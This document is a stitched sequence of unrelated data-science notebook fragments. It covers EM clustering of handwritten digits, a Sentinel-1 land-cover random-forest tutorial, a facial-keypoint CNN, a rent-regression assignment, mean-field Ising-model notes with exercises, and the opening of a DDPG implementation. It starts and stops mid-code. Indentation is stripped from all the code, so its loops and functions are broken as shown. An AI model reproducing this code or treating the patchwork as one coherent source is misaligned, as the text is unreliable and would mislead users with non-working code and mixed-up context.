plt.plot(P,label='EM probs', color = [1, 0, 0])
plt.legend()
plt.title('Cluster Probabilites')
```
## EM for a data set of handwritten digits
Load and run the EM over the [sklearn dataset of digits](http://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_digits.html#sklearn.datasets.load_digits). Each datapoint is an 8x8 image of a digit.
```
from sklearn.datasets import load_digits
digits = load_digits() #Gray scale, we have to binarize
print(digits.data.shape)
plt.gray()
plt.matshow(digits.images[15])
plt.show()
#Binarization
Bin_Images = np.copy(digits.images)
val_min=np.min(Bin_Images)
val_max=np.max(Bin_Images)
Bin_Images = (Bin_Images - val_min) / (val_max - val_min)
Bin_Images = np.round(Bin_Images)
plt.gray()
plt.matshow(Bin_Images[15])
plt.show()
# EM
K = 10
D = 64
X = Bin_Images.reshape([-1,D])
N = X.shape[0] # number of digit images (otherwise the synthetic N=5000 would leak in)
P = np.random.rand(K,1)
P /= np.sum(P)  # normalize the random initialization (not P_true!)
Theta = np.ones([K,D])*1.0/K
Num_Iter = 1000
alpha = 2.
beta = 2.
LL = np.zeros([Num_Iter,1])
for i in range(Num_Iter):
LL[i] = log_lik(X,P,Theta,K)
R = responsibilities(X,P,Theta,K)
P = new_P(R,N)
Theta = new_Theta(R,X,K,alpha,beta)
# Plot the evolution of the negative LL. It should always decrease!
plt.semilogy(-LL,'-*')
# Plot as a 8x8 gray-scale image each theta_k vector
# (it represents the probability of each pixel to take value 1)
for k in range(K):
plt.gray()
plt.matshow(Theta[k,:].reshape([8,8]))
plt.show()
```
## EM for the MNIST Database (optional)
Repeat the experiment for the MNIST Database. Take $10^4$ images **at random**, and binarize the database.
```
from sklearn.datasets import fetch_openml # fetch_mldata was removed from sklearn
mnist = fetch_openml('mnist_784', version=1, as_frame=False)
images = mnist.data #70000 images
plt.gray()
plt.matshow(images[0,:].reshape([28,28]))
plt.show()
val_min=np.min(images)
val_max=np.max(images)
Bin_Images = (images - val_min) / (val_max - val_min)
Bin_Images = np.round(Bin_Images)
plt.gray()
plt.matshow(Bin_Images[0,:].reshape([28,28]))
plt.show()
mask = np.random.permutation(Bin_Images.shape[0])
Bin_Images = Bin_Images[mask,:]
# EM
K = 10
D = 784
N = 1000
X = Bin_Images[:N,:]
P = np.random.rand(K,1)
P /= np.sum(P)  # normalize the random initialization (not P_true!)
Theta = 0.5/K*np.ones([K,D])+0.5*np.random.rand(K,D)
Num_Iter = 1000
alpha = 2.1
beta = 2.1
LL = np.zeros([Num_Iter,1])
for i in range(Num_Iter):
LL[i] = log_lik(X,P,Theta,K)
R = responsibilities(X,P,Theta,K)
P = new_P(R,N)
Theta = new_Theta(R,X,K,alpha,beta)
if(i % 20 ==0):
print('Iteration ',i)
# Plot the evolution of the negative LL. It should always decrease!
plt.plot(-LL,'-*')
# Plot as a 28x28 gray-scale image each theta_k vector
# (it represents the probability of each pixel to take value 1)
for k in range(K):
plt.gray()
plt.matshow(Theta[k,:].reshape([28,28]))
plt.show()
```
# Impressions on the lc_classif python package
## Content
1. Import of Necessary Python Modules
2. Conduct resampling and subsetting of data and mask
3. Import of Data and First Impressions on Classes
4. Analyze and Impute Missing Values
5. Analyze Class Separability
6. Split into Test and Training Dataset
7. Basic Random Forest Model
8. Tuning Base Model
9. Base Model with Feature Selection
# 1. Import of Necessary Python Modules
```
from RanForCorine import geodata_handling as datahandler
from RanForCorine import data_cleaning as clean
from RanForCorine import descriptive_stats as descr
from RanForCorine import separability as sep
from RanForCorine import test_training_separation as tts
from RanForCorine import randomforest_classifier as rf
from RanForCorine import accuracy as acc
from RanForCorine import tuning as tuning
from RanForCorine import feature_importance as feat
from RanForCorine import visualization as vis
import numpy as np
from osgeo import osr  # needed below for writing the GeoTIFF results
```
# 2. Resampling and subsetting of the data
Before starting the selection of the classes and training the random forest model, some preparation of the data might be necessary. The data and the land cover mask should have the same extent and resolution. The Sentinel-1 data is then split by class into a DataFrame of backscatter values.
```
# set the necessary file paths
fp_stack=r"Path\to\Sentinel1\data"
fp_hdr=r"Path\to\Sentinel1\data.hdr"
fp_mask=r"Path\to\CorineLandCover\mask.tif"
fp_s1_res=r'Path\to\save\resampled\Sentinel1'
fp_mask_sub=r'Path\to\save\subsetted\CLC\mask.tif'
fp_csv=r'Path\to\save\splitted\data.csv'
fp_out=r'Path\to\save\result.tif'
# adjust pixel size and extent of S-1 data and mask
datahandler.adjust(fp_stack,fp_mask, epsg=32633, write=True, outfp1=fp_s1_res,\
outfp2=fp_mask_sub,hdrfp=fp_hdr,subset=False)
# split the Sentinel-1 data into the Corine Land Cover classes and return the DataFrame
fp_s1_res=r"D:\Master\Geo419\Projekt\Daten\test\s1_resampled"
fp_mask_sub=r"D:\Master\Geo419\Projekt\Daten\test\clc_mask_clipped"
data_raw=datahandler.split_classes(fp_s1_res,fp_mask_sub)
data_raw.head(10)
```
# 3. First Impressions on Classes
In this section the data is imported and first impressions of the dataset are shown. For example, a barplot shows how many pixels/values there are per class. As will be seen later on, the number of pixels has a substantial impact on class separability.
```
# IMPORT DATA ################################
# data_raw = datahandler.importCSV(r"Path\to\splitted\data.csv").drop(data_raw.columns[0], axis=1) #remove index column
print(data_raw.columns)
# FIRST IMPRESSIONS ##########################
class_count = descr.countPxlsPerClass(data_raw, "Label_nr")
class_count.plot.bar()
```
Furthermore, it is possible to plot histograms for selected classes. As the plots below for the Vattenrike data show, class distributions differ widely across the dataset.
```
# plot histogram
descr.plotHist(data_raw, 211, "Label_nr")
# plot histogram
descr.plotHist(data_raw, 522, "Label_nr")
```
# 4. Analyze and Impute Missing Values
As the Random Forest model used in this package is based on scikit-learn, it cannot operate on null values in the data. Before fitting the model it is necessary to get rid of any missing values. The package provides the opportunity to count missing data fields and impute each with the mean of the column in which it is located.
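As a hedged illustration of what this imputation amounts to with plain pandas (the package's `clean.imputeMean` is assumed to work along these lines; the column names here are made up):

```python
import numpy as np
import pandas as pd

def impute_mean(df, null_value=-99.0):
    """Replace a sentinel null value by the mean of its column."""
    df = df.replace(null_value, np.nan)            # mark sentinels as missing
    return df.fillna(df.mean(numeric_only=True))   # fill with column means

example = pd.DataFrame({"VV_t1": [1.0, -99.0, 3.0], "Label_nr": [211, 211, 512]})
imputed = impute_mean(example)                     # the -99.0 becomes 2.0
```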
```
# MISSING VALUES #############################
print("--- ANALYZING MISSING VALUES ---")
missing_count = clean.countMissingValuesTotal(data_raw, null_value=-99.0)
print(str(missing_count) + " values are missing.")
# Impute missing values with mean in column
data_imp = clean.imputeMean(data_raw, clean=True, null_value=-99.0) # note: %timeit would discard the assignment
print("Done imputing missing values.")
```
# 5. Analyze Class Separability
As there are so many classes in the dataset, it is recommended to analyze their separability. For this purpose three different distance measures can be calculated. In this example the Euclidean distance is shown in a heatmap, clearly visualizing the most separable classes.
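A minimal sketch of one such distance measure (an assumption on my part: `sep.calcSep` presumably reports quantities of roughly this kind), the Euclidean distance between per-class mean feature vectors:

```python
import numpy as np
import pandas as pd

def euclidean_separability(df, label_col):
    """Pairwise Euclidean distance between the mean feature vectors of each class."""
    means = df.groupby(label_col).mean()           # one mean vector per class
    labels = list(means.index)
    dist = pd.DataFrame(0.0, index=labels, columns=labels)
    for a in labels:
        for b in labels:
            dist.loc[a, b] = np.linalg.norm(means.loc[a] - means.loc[b])
    return dist
```

Well-separated class pairs get large entries, which is exactly what the heatmap makes visible.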
```
# CLASS SEPARABILITY ##########################
print("--- ANALYZING CLASS SEPARABILITY ---")
class_sep = sep.calcSep(data_imp, "Label_nr")
sep.printHeatmap(class_sep, "Euclidean")
```
To use only the most separable classes in the model, all remaining classes are compressed into a single class 0. The plot shows that there are now approximately 15,000 pixels of class 0.
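A hypothetical sketch of this compression step (`clean.compressClasses` is assumed to behave similarly): any label outside the kept list is mapped to 0.

```python
import pandas as pd

def compress_classes(df, keep, label_col, new_col):
    """Copy the label column into new_col, setting all labels not in `keep` to 0."""
    out = df.copy()
    out[new_col] = out[label_col].where(out[label_col].isin(keep), other=0)
    return out
```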
```
# we decided to use following classes
sep_list = [112,211,231,311,312,523,512]
# add column to dataset setting all unwanted class values to 0
data_comp = clean.compressClasses(data_imp, sep_list, "Label_nr", "Label_new")
# count number of pixels per class
class_count_comp = descr.countPxlsPerClass(data_comp, "Label_new")
class_count_comp.plot.bar()
# plot histogram
descr.plotHist(data_comp, 0, "Label_new")
```
A new separability analysis compares the remaining classes.
```
# show new separability
class_sep2 = sep.calcSep(data_comp, "Label_new")
sep.printHeatmap(class_sep2, "Euclidean")
```
# 6. Split into Test and Training Dataset
In this step the images are split into test and training datasets. The training dataset needs to be larger and is used to train the model, while the test dataset is used to predict class values. The class labels are split into test and training sets accordingly.
As this package is intended for image classification, the test dataset is always the upper portion of the image. In this example we used a test size of 0.3, so the upper 30 % of the image rows are used for testing (prediction) and the lower 70 % for training.
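A hypothetical sketch of such a row-wise split (`tts.imageSplit` is assumed to behave along these lines; whether `imagedim` is rows-first or columns-first is an assumption here):

```python
import numpy as np

def image_split(data, labels, n_rows, n_cols, testsize=0.3):
    """Top `testsize` fraction of image rows -> test set, the rest -> training set.

    `data` holds one row per pixel (row-major flattened image), `labels` one
    class label per pixel.
    """
    n_test = int(round(n_rows * testsize)) * n_cols   # pixels in the top rows
    x_test, x_train = data[:n_test], data[n_test:]
    y_test, y_train = labels[:n_test], labels[n_test:]
    return x_train, x_test, y_train, y_test
```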
```
# TEST TRAINING #################################
print("--- Test Training Split ---")
x_train, x_test, y_train, y_test = tts.imageSplit(data_comp, labelcol="Label_new", imagedim=[455,423], testsize=0.3)
```
# 7. Basic Random Forest Model
Now it is time for the basic Random Forest (RF) model. To keep computing time as low as possible we chose low max_depth and n_estimators values, which results in a model that is not as powerful as it could be.
The model is fitted to the training data. Afterwards, the prediction is carried out.
```
# RANDOM FOREST BASE MODEL ######################
print("--- CALCULATING BASE MODEL ---")
base_model = rf.RandomForestClassifier(max_depth=2, random_state=1, n_estimators=50)
rf.fitModel(base_model, x_train, y_train)
print("--- DONE FITTING MODEL ---")
base_pred = rf.predictModel(base_model, x_test)
print("--- DONE PREDICTING ---")
```
Now accuracy score and confusion matrix are printed.
```
# ACCURACY
base_acc = acc.getAccuracy(base_pred, y_test)
print("Base model has accuracy of: " + str(base_acc))
base_conf = acc.getConfMatrix(base_pred, y_test)
classes = [0, 112, 211, 231, 311, 312, 512, 523]
acc.printConfMatrix(base_conf, classes)
```
The predicted image shows that only a few classes could be classified with this model.
```
vis.plotResult(base_pred, [127, 455])
```
# 8. Tuning Base Model
As it is practically impossible to find the right combination of parameters for a complex RF model by hand, it is recommended to use hyperparameter tuning. The best setting is searched for using three-fold cross-validation over a grid of candidate parameter values. This clearly improves accuracy.
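In plain scikit-learn the tuning step boils down to something like the following (an assumption: `tuning.tuneModel` presumably wraps a similar search; shown here on a synthetic toy problem, not the satellite data):

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV

# Exhaustive search over a small parameter grid, scored by 3-fold CV.
X_toy, y_toy = make_classification(n_samples=60, random_state=0)
grid = {"n_estimators": [5, 10], "max_depth": [2, None]}
search = GridSearchCV(RandomForestClassifier(random_state=1), grid, cv=3)
search.fit(X_toy, y_toy)
best = search.best_estimator_   # refit on all data with the best grid cell
```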
```
# BASE MODEL TUNING
print("--- TUNING BASE MODEL ---")
base_params = tuning.getParamsOfModel(base_model)
print(base_params)
max_depth_base = [int(x) for x in np.linspace(10, 110, num = 5)]
max_depth_base.append(None)
base_grid = {'n_estimators': [int(x) for x in np.linspace(start = 50, stop = 200, num = 5)],
'max_features': ['auto', 'sqrt'],
'max_depth': max_depth_base}
best_base_model = tuning.tuneModel(base_grid, x_train, y_train, n_jobs=1)
best_base_pred = rf.predictModel(best_base_model, x_test)
best_base_acc = acc.getAccuracy(best_base_pred, y_test)
print("Tuned base model has accuracy of: " + str(best_base_acc))
best_base_conf = acc.getConfMatrix(best_base_pred, y_test)
classes = [0, 112, 211, 231, 311, 312, 512, 523] #list here the class numbers in ascending order
acc.printConfMatrix(best_base_conf, classes)
params=tuning.getParamsOfModel(best_base_model)
print(params)
```
As it can be seen in the plotted result all classes could be predicted.
```
vis.plotResult(best_base_pred, [127, 455])
```
# 9. Base Model with Feature Selection
In addition to tuning it is possible to use feature selection. Since the dataset contains more than 200 features (images), the plot shows only the 10 most important ones.
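For reference, the quantity behind such a plot is the impurity-based importance a fitted forest exposes, one value per feature (a plain-sklearn sketch on toy data where only one feature carries signal):

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.RandomState(0)
X_toy = rng.rand(200, 5)
y_toy = (X_toy[:, 2] > 0.5).astype(int)   # only feature 2 determines the label
forest = RandomForestClassifier(n_estimators=50, random_state=0).fit(X_toy, y_toy)
ranking = np.argsort(forest.feature_importances_)[::-1]  # most important first
```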
```
feat.importancePlot(base_model, x_train.columns, 10)
```
Based on those important features it is possible to carry out a new classification by training a new model. This slightly improves the base model.
```
# select important features
x_important_test, x_important_train = feat.selectImportantFeatures(base_model, x_train, y_train, x_test)
sel_model = rf.RandomForestClassifier(max_depth=2, random_state=1, n_estimators=50)
rf.fitModel(sel_model, x_important_train, y_train)
sel_pred = rf.predictModel(sel_model, x_important_test)
sel_acc = acc.getAccuracy(sel_pred, y_test)
print("Model with selected features has accuracy of: " + str(sel_acc)) #0.67
sel_pred_conf = acc.getConfMatrix(sel_pred, y_test)
classes = [0, 112, 211, 231, 311, 312, 512, 523] #list here the class numbers in ascending order
acc.printConfMatrix(sel_pred_conf, classes)
vis.plotResult(sel_pred, [127, 455])
# save the result to disk as GeoTIFF
ds=datahandler.read_file_gdal(fp_s1_res)
gt=ds.GetGeoTransform()
srs=osr.SpatialReference()
srs.ImportFromWkt(ds.GetProjection())
sel_pred=sel_pred.reshape((127, 455))
datahandler.create_gtiff(sel_pred,gt,srs,r"D:\Master\Geo419\Projekt\Daten\test\sel_pred_VH.tif")
best_base_pred=best_base_pred.reshape((127, 455))
datahandler.create_gtiff(best_base_pred,gt,srs,r"D:\Master\Geo419\Projekt\Daten\test\best_base_pred_VH.tif")
base_pred=base_pred.reshape((127, 455))
datahandler.create_gtiff(base_pred,gt,srs,r"D:\Master\Geo419\Projekt\Daten\test\base_pred_VH.tif")
```
```
# import modules
%matplotlib inline
import os
import pylab as plt
import cPickle as pkl
import numpy as np
import pandas as pd
from theano import *
from sklearn.utils import shuffle
from lasagne import layers, updates, nonlinearities
from nolearn.lasagne import NeuralNet, BatchIterator, visualize
FTRAIN = '../data/misc/face_data/training.csv'
FTEST = '../data/misc/face_data/test.csv'
model_root= '../models'
# Load train and test set
def load(test=False, cols=None):
fname = FTEST if test else FTRAIN
df = pd.read_csv(os.path.expanduser(fname))
# The Image column has pixel values separated by space; convert
# the values to numpy arrays:
df['Image'] = df['Image'].apply(lambda im: np.fromstring(im, sep=' '))
if cols: # get a subset of columns
df = df[list(cols) + ['Image']]
#print(df.count()) # prints the number of values for each column
df = df.dropna() # drop all rows that have missing values in them
X = np.vstack(df['Image'].values) / 255. # scale pixel values to [0, 1]
X = X.astype(np.float32)
if not test: # only FTRAIN has any target columns
y = df[df.columns[:-1]].values
y = (y - 48) / 48 # scale target coordinates to [-1, 1]
X, y = shuffle(X, y, random_state=42) # shuffle train data
y = y.astype(np.float32)
else:
y = None
return X, y
#reshape flat pixel vectors into 2D image format for the conv net
def load2d(test=False, cols=None):
X, y = load(test=test)
X = X.reshape(-1, 1, 96, 96)
return X, y
#network architecture
net = NeuralNet(
layers=[
('input', layers.InputLayer),
('conv1', layers.Conv2DLayer),
('pool1', layers.MaxPool2DLayer),
('conv2', layers.Conv2DLayer),
('pool2', layers.MaxPool2DLayer),
('conv3', layers.Conv2DLayer),
('pool3', layers.MaxPool2DLayer),
('output', layers.DenseLayer),
],
input_shape=(None, 1, 96, 96),
conv1_num_filters=32, conv1_filter_size=(5, 5),
pool1_pool_size=(3, 3),
conv2_num_filters=64, conv2_filter_size=(5, 5),
pool2_pool_size=(3, 3),
conv3_num_filters=128, conv3_filter_size=(5, 5),
pool3_pool_size=(3, 3),
output_num_units=30, output_nonlinearity=None,
update=updates.adam,
regression=True,
max_epochs=100,
verbose=1,
)
#Training
X, y = load2d();
net.fit(X, y);
#save model
with open(os.path.join(model_root, 'toy_localizer.pkl'), 'wb') as f:
pkl.dump(net, f, -1)
f.close()
#load model
with open(os.path.join(model_root, 'toy_localizer.pkl'), 'rb') as f:
net = pkl.load(f)
f.close()
#prediction results
def plot_sample(x, y, axis):
img = x.reshape(96, 96)
axis.imshow(img, cmap='gray')
axis.scatter(y[0::2] * 48 + 48, y[1::2] * 48 + 48, marker='x', s=10)
X, _ = load2d(test=True)
y_pred = net.predict(X)
fig = plt.figure(figsize=(6, 6))
fig.subplots_adjust(
left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05)
for i in range(16):
ax = fig.add_subplot(4, 4, i + 1, xticks=[], yticks=[])
plot_sample(X[i], y_pred[i], ax)
plt.show()
#visualize first layer weights
visualize.plot_conv_weights(net.layers_['conv1'])
#visualize first layer activations for one input image
visualize.plot_conv_activity(net.layers_['conv1'], X[i:i+1, :, :, :])
```
Lambda School Data Science, Unit 2: Predictive Modeling
# Regression & Classification, Module 1
## Assignment
You'll use another **New York City** real estate dataset.
But now you'll **predict how much it costs to rent an apartment**, instead of how much it costs to buy a condo.
The data comes from renthop.com, an apartment listing website.
- [ ] Look at the data. What's the distribution of the target, `price`, and features such as `longitude` and `latitude`? Remove outliers.
- [ ] After you remove outliers, what is the mean price in your subset of the data?
- [ ] Choose a feature, and plot its relationship with the target.
- [ ] Use scikit-learn for linear regression with one feature. You can follow the [5-step process from Jake VanderPlas](https://jakevdp.github.io/PythonDataScienceHandbook/05.02-introducing-scikit-learn.html#Basics-of-the-API).
- [ ] Define a function to make new predictions and explain the model coefficient.
- [ ] Organize and comment your code.
> [Do Not Copy-Paste.](https://docs.google.com/document/d/1ubOw9B3Hfip27hF2ZFnW3a3z9xAgrUDRReOEo-FHCVs/edit) You must type each of these exercises in, manually. If you copy and paste, you might as well not even do them. The point of these exercises is to train your hands, your brain, and your mind in how to read, write, and see code. If you copy-paste, you are cheating yourself out of the effectiveness of the lessons.
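For orientation only, the five-step pattern looks like this on synthetic data (deliberately not the renthop data; the numbers here are made up):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

# 1. choose a model class, 2. instantiate it, 3. arrange X (2D) and y (1D),
# 4. fit, 5. predict for new inputs.
rng = np.random.RandomState(0)
X = rng.uniform(0, 100, size=(50, 1))                   # one feature
y = 1000 + 30 * X[:, 0] + rng.normal(0, 50, size=50)    # linear target + noise
model = LinearRegression()
model.fit(X, y)
y_new = model.predict([[40.0]])
# model.coef_[0] recovers roughly 30: the predicted change in y per unit of X
```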
## Stretch Goals
- [ ] Do linear regression with two or more features.
- [ ] Read [The Discovery of Statistical Regression](https://priceonomics.com/the-discovery-of-statistical-regression/)
- [ ] Read [_An Introduction to Statistical Learning_](http://faculty.marshall.usc.edu/gareth-james/ISL/ISLR%20Seventh%20Printing.pdf), Chapter 2.1: What Is Statistical Learning?
```
import os, sys
in_colab = 'google.colab' in sys.modules
# If you're in Colab...
if in_colab:
# Pull files from Github repo
os.chdir('/content')
!git init .
!git remote add origin https://github.com/LambdaSchool/DS-Unit-2-Regression-Classification.git
!git pull origin master
# Install required python packages
!pip install -r requirements.txt
# Change into directory for module
os.chdir('module1')
# Ignore this Numpy warning when using Plotly Express:
# FutureWarning: Method .ptp is deprecated and will be removed in a future version. Use numpy.ptp instead.
import warnings
warnings.filterwarnings(action='ignore', category=FutureWarning, module='numpy')
# Read New York City apartment rental listing data
import pandas as pd
df = pd.read_csv('../data/renthop-nyc.csv')
assert df.shape == (49352, 34)
```
# Mean Field Theory
## Essence of Mean Field Approximation (MFA): replacing fluctuating terms by averages
Let us assume that each spin $i$, independently of the others, feels some average field:
$$H_i = -J\sum_{\delta} s_i s_{i+\delta} - h s_i = -\Big(J\sum_{\delta}s_{\delta} +h \Big) s_i$$
Each spin experiences a local field set by its nearest neighbours:
$$H_i = J\sum_{\delta}s_{\delta}+h$$
$$H^{eff}=-\sum_i H_i s_i$$
> The difficulty with the effective field is that $H_i$ depends on the instantaneous states of the neighbouring spins of $s_i$, which fluctuate
We now make a dramatic approximation: replace the effective field by its mean, so that each spin experiences a field independent of the others. Due to translational invariance the average magnetization per spin is the same for every spin (with periodic boundary conditions, that is)
$$H^{MFA}_i = \langle H_i \rangle = J\sum_{\delta} \langle s_{\delta} \rangle+h = Jzm+h$$
- z=4 for the 2D square lattice
- z=6 for the 3D cubic lattice
**In the MFA the Hamiltonian factors into additive single-spin components,** just like the exact $J=0$ case we had earlier.
$$\boxed{m = tanh(\beta(Jzm+h))}$$
**The $h=0$ MFA case**
The equation can be solved in a self-consistent manner, or graphically by finding the intersection between:
- $m =tanh(x)$
- $x = \beta Jzm$
When the slope $\beta J z$ equals one we get the dividing line between the two behaviours (a single intersection at $m=0$ versus three intersections):
$$k_B T_c =zJ$$
$$m = tanh \Big(\frac{Tc}{T} m \Big)$$
> **The MFA predicts a phase transition for the 1D Ising model at finite $T=T_c$, in contradiction with the exact solution, which has no finite-temperature transition!**
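Besides the graphical construction below, the self-consistency equation can be solved numerically by fixed-point iteration (a small sketch with $k_B = 1$, so $T_c = zJ$ enters only through the ratio $T_c/T$):

```python
import numpy as np

def solve_m(T, Tc=1.0, h=0.0, m0=0.9, tol=1e-10, max_iter=100000):
    """Iterate m <- tanh((Tc*m + h)/T), i.e. m = tanh(beta*(J*z*m + h)) with k_B = 1."""
    m = m0
    for _ in range(max_iter):
        m_new = np.tanh((Tc * m + h) / T)
        if abs(m_new - m) < tol:
            break
        m = m_new
    return m_new
```

Above $T_c$ the iteration collapses to $m=0$ unless a field is applied; below $T_c$ it converges to a nonzero spontaneous magnetization.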
```
import holoviews as hv
import ipywidgets as widgets
from ipywidgets import interact
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
@widgets.interact(T=(0.1,5), Tc=(0.1,5))
def mfa_ising1d_plot(T=1, Tc=1):
x = np.linspace(-3,3,1000)
f = lambda x: (T/Tc)*x
m = lambda x: np.tanh(x)
plt.plot(x,m(x), lw=3, alpha=0.9, color='green')
plt.plot(x,f(x),'--',color='black')
idx = np.argwhere(np.diff(np.sign(m(x) - f(x))))
plt.plot(x[idx], f(x)[idx], 'ro')
plt.legend(['m=tanh(x)', 'x'])
plt.ylim(-2,2)
plt.grid('True')
plt.xlabel('m',fontsize=16)
plt.ylabel(r'$tanh (\frac{Tc}{T} m )$',fontsize=16)
@widgets.interact(Tc_T=(0.1,5))
def mfa_ising1d_h_plot(Tc_T=1):
x = np.linspace(-1,1,200)
h = lambda x: np.arctanh(x) - Tc_T*x
plt.plot(h(x),x, lw=3, alpha=0.9, color='green')
plt.plot(x, np.zeros_like(x), lw=1, color='black')
plt.plot(np.zeros_like(x), x, lw=1, color='black')
plt.grid(True)
plt.ylabel('m',fontsize=16)
plt.xlabel('h',fontsize=16)
plt.ylim([-1,1])
plt.xlim([-1,1])
```
### Critical exponents
**A signature of phase transitions and critical phenomena is that there are universal power-law behaviours near the critical point**
$$m \sim |T-T_c |^{\beta}$$
$$c \sim |T-T_c|^{-\alpha}$$
$$\chi =\frac{\partial m}{\partial B} \sim |T-T_c|^{-\gamma}$$
**Correlation lengths $\xi$ diverge at critical points**
$$f(r=|j-k|) = \langle s_j s_k \rangle \sim r^{-d+2+\eta}e^{-r/\xi}$$
$$\xi \sim |T-T_c|^{-\nu}$$
### Mean field exponents
We can derive the value of the critical exponent $\beta$ within the mean field approximation by Taylor expanding the hyperbolic tangent
$$tanh(x) \approx x-\frac{1}{3}x^3+...$$
$$m = tanh(\beta J z m) \approx \beta J z m - \frac{1}{3} (\beta Jzm)^3$$
- One solution is obviously m = 0 which is the only solution above $T_c$
- Below $T_c$ the non-zero solution is found $m=\sqrt{3}\frac{T}{T_c} \Big(1-\frac{T}{T_c} \Big)^{1/2}+...$
- $\beta_{MFA}=1/2$
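The prediction $\beta_{MFA}=1/2$ can be checked numerically against the asymptotic formula (a sketch with $k_B = 1$ and $T_c = zJ$ scaled to 1):

```python
import numpy as np

def m_fixed_point(T, Tc=1.0, m0=0.9, n_iter=20000):
    """Iterate the MFA self-consistency m = tanh((Tc/T) m) to convergence."""
    m = m0
    for _ in range(n_iter):
        m = np.tanh(Tc * m / T)
    return m

# Just below Tc the numerical solution should track the asymptotic form
# m ~ sqrt(3) (T/Tc) (1 - T/Tc)^(1/2) derived above.
T = 0.99
m_num = m_fixed_point(T)
m_asym = np.sqrt(3) * T * np.sqrt(1.0 - T)
```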
### Helmholtz Free energy
$$dF_{T, M} = -SdT + BdM $$
$$F = \int dF = F_0 + \int^{M}_0 B(M) dM$$
We will now make use of mean field theory to approximate the dependence of the field on the magnetization, $h(m) \approx m(1-T_c/T)+ \frac{1}{3} m^3$, which enables us to evaluate the integral above.
$$B(M) = aM +bM^3$$
$$F = F_0 + \frac{1}{2}aM^2 + \frac{1}{4} bM^4$$
Equilibrium is found by minimizing the free energy: $aM +bM^3 = 0$, with solutions $M = 0$ and $M=\pm (-a/b)^{1/2}$
- $T < T_c$ case we get $a<0$ and $M=\pm (-|a|/b)^{1/2} = \pm M_S$
- $T > T_c$ case we get $a>0$ and $M=0$
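A quick numerical check of this minimization (with illustrative values $a<0$, $b>0$ of my own choosing, not material constants):

```python
import numpy as np

# Verify that for a < 0 the minima of F(M) = a M^2/2 + b M^4/4
# sit at M = +/- sqrt(-a/b), as found from dF/dM = aM + bM^3 = 0.
a, b = -2.0, 0.5          # illustrative values only
M = np.linspace(-3.0, 3.0, 20001)
F = 0.5 * a * M**2 + 0.25 * b * M**4
M_min = M[np.argmin(F)]   # one of the two symmetric minima
M_pred = np.sqrt(-a / b)  # = 2.0 here
```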
```
@widgets.interact(T=(400,800))
def HelmF(T=400):
Tc=631 # constant for Ni
a = 882*(T/Tc-1)
b = 0.4734*T
M = np.linspace(-2,2,1000)
plt.plot(M, 0.5*a*M**2 + 0.25*b*M**4, lw=4, color='brown', label=f"T/Tc = {(T/Tc)}")
plt.grid(True)
plt.xlim([-2,2])
plt.ylim([-140,200])
plt.ylabel('$F(M)$')
plt.xlabel('$M$')
plt.legend()
```
### Problems
1. Use the transfer matrix method to solve the general 1D Ising model with $h = 0$ (do not simply copy the earlier solution by setting $h=0$; repeat the derivation :)
<br>
2. Find the free energy per particle $F/N$ in the limit $N\rightarrow \infty$ for both the periodic boundary condition and free boundary cases.
3. Plot the temperature dependence of the heat capacity and free energy for the $(h\neq 0, J\neq 0)$, $(h=0, J\neq 0)$ and $(h\neq 0, J=0)$ cases of the 1D Ising model. Comment on the observed behaviours.
4. Explain why heat capacity and magnetic susceptibility diverge at critical temperatures.
5. Explain why the correlation length diverges at the critical temperature
6. Explain why are there universal critical exponents.
7. Explain why the dimensionality and range of interactions matter for the existence and nature of phase transitions.
8. Using the mean field approximation, show that near the critical temperature the magnetization per spin goes as $m\sim (T_c-T)^{\beta}$ (this critical exponent is not to be confused with the inverse temperature $\beta=1/k_B T$) and find the value of $\beta$. Do the same for the magnetic susceptibility $\chi \sim (T-T_c)^{-\gamma}$ and find the value of $\gamma$
9. Explain the nature of the mean field approximation: why do its predictions fail for low dimensional systems but consistently get better in higher dimensions?
10. Consider a 1D model given by the Hamiltonian:
$$H = -J\sum^{N}_{i=1} s_i s_{i+1} + D\sum^{N}_{i=1} s^2_i $$
where $J>1$, $D>1$ and $s_i =-1,0,+1$
- Assuming periodic boundary conditions, calculate the eigenvalues of the transfer matrix
- Obtain expressions for the internal energy, entropy and free energy
- What is the ground state of this model (T=0) as a function of $d=D/J$? Obtain the asymptotic form of the eigenvalues of the transfer matrix in the limit $T\rightarrow 0$ in the characteristic regimes of $d$ (e.g. consider the different extreme cases)
```
"""
Implementation of DDPG - Deep Deterministic Policy Gradient
Algorithm and hyperparameter details can be found here:
http://arxiv.org/pdf/1509.02971v2.pdf
The algorithm is tested on the Pendulum-v0 OpenAI gym task
and developed with tflearn + Tensorflow
Author: Patrick Emami
"""
import tensorflow as tf
import numpy as np
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
# ===========================
# Actor and Critic DNNs
# ===========================
class ActorNetwork(object):
"""
Input to the network is the state, output is the action
under a deterministic policy.
The output layer activation is a tanh to keep the action
between -action_bound and action_bound
"""
def __init__(self, sess, state_dim, action_dim, action_bound, learning_rate, tau, batch_size):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.action_bound = action_bound
self.learning_rate = learning_rate
self.tau = tau
self.batch_size = batch_size
# Actor Network
self.inputs, self.out, self.scaled_out = self.create_actor_network()
self.network_params = tf.trainable_variables()
# Target Network
self.target_inputs, self.target_out, self.target_scaled_out = self.create_actor_network()
self.target_network_params = tf.trainable_variables()[
len(self.network_params):]
# Op for periodically updating target network with online network
# weights
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) +
tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# This gradient will be provided by the critic network
self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim])
# Combine the gradients here
self.unnormalized_actor_gradients = tf.gradients(
self.scaled_out, self.network_params, -self.action_gradient)
self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))
# Optimization Op
self.optimize = tf.train.AdamOptimizer(self.learning_rate).\
apply_gradients(zip(self.actor_gradients, self.network_params))
self.num_trainable_vars = len(
self.network_params) + len(self.target_network_params)
def create_actor_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
